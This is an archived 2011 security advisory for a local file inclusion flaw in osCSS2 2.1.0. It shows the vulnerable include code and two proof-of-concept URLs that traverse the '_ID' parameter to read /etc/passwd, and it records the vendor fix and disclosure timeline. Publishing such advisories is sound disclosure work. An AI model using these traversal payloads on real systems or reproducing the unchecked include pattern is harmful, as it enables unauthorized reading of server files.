osCSS2 2.1.0 Local File Inclusion

osCSS2 2.1.0 Local File Inclusion: Posted Nov 9, 2011; Authored by Stefan Schurtz; osCSS2 version 2.1.0 suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | 5100e146ad06521763e2d7587c292b18abba2e624e044cd91cb877d56a88f108; Download | Favorite | View

osCSS2 2.1.0 Local File Inclusion

Advisory:                osCSS2 "_ID" parameter Local file inclusion
Advisory ID:             SSCHADV2011-034
Author:                  Stefan Schurtz
Affected Software:    Successfully tested on osCSS2 2.1.0 (latest version)
Vendor URL:            http://oscss.org/
Vendor Status:         Fixed in svn branche 2.1.0 and reported in develop version 2.1.1

==========================
Vulnerability Description
==========================

osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability

==========================
Vulnerable code
==========================

//.htaccess
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}

//content.php
require($page->path_gabarit());

// includes/classes/page.php
public function pile_file_lang($path_file){
    global $lang;
    if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;

if(!in_array($path_file,(array)$this->PileFileLang))
      include_once($path_file);
}

==================
PoC-Exploit
==================

http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd

=========
Solution
=========

Fixed in svn branche 2.1.0 and reported in develop version 2.1.1

====================
Disclosure Timeline
====================

08-Nov-2011 - informed vendor
08-Nov-2011 - release date of this security advisory
08-Nov-2011 - fixed by vendor

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
http://dev.oscss.org/task/892
http://www.rul3z.de/advisories/SSCHADV2011-034.txt

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

osCSS2 2.1.0 Local File Inclusion

osCSS2 2.1.0 Local File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

osCSS2 2.1.0 Local File Inclusion

Share This

osCSS2 2.1.0 Local File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems